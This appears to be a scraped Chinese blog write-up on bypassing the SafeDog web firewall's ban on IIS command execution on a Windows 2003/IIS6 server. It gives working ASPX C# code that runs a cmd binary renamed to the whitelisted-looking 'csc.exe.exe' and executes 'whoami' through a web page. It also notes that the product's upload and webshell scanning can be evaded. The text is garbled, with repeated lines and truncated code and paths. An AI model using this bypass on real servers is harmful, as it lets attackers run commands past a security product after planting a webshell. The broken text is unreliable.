摘要
简要描述: 安全狗禁止执行iis命令绕过 系统是win2003 iis6.0
4:自己创建了一个aspx的页面代码如下:
安全狗禁止执行iis命令绕过
简要描述:
安全狗禁止执行iis命令绕过
详细说明:
1:= =
1):
2):浏览防护,直接访问aspx马,查杀
3):静态扫描
4):马传上去之后还有一句话连接的防护,就是常见的灭菜刀
5):还有恶意组件禁止执行
6):禁止iis的命令执行
2:前面的1234,zone里经常有人讨论,上传和静态查杀使用之前的zone里发过的内容即可绕过,这里主要说下最后个禁止iis命令执行
3:这里我使用的网站安全狗,版本是3.5版本
系统是win2003 iis6.0
4:自己创建了一个aspx的页面代码如下:
using System; using System.Data; using System.Configuration; using System.Web; using System.Web.Security; using System.Web.UI; using System.
大致就是点击的时候执行了一个cmd的命令
5:开启安全的时候直接报错了,提示执行了cmd命令
6:这里我们查看了一下白名单,于是有了想法,我把exe文件改成csc.exe.exe,看看行不行,于是我拷贝了一个到C:/WINDOWS/Microsoft.
7:然后修改代码执行下:
修改后的文件代码:
using System; using System.Data; using System.Configuration; using System.Web; using System.Web.Security; using System.Web.UI; using System.Web.UI.WebControls; using System.Web.UI.WebControls.WebParts; using System.Web.UI.HtmlControls; using System.Diagnostics; using System.ComponentModel; public partial class _Default : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { } protected void btnShow_Click(object sender, EventArgs e) { Process p = new Process(); p.StartInfo.FileName = "C://WINDOWS//Microsoft.NET//Framework//v4.0.30319//csc.exe.exe"; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardError = true; p.StartInfo.CreateNoWindow = true; string strOutput = null; p.Start(); p.StandardInput.WriteLine("whoami"); p.StandardInput.WriteLine("exit"); strOutput = p.StandardOutput.ReadToEnd(); p.WaitForExit(); p.Close(); this.lblDisplay.Text = strOutput; } }
7:然后修改代码执行下:
355
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
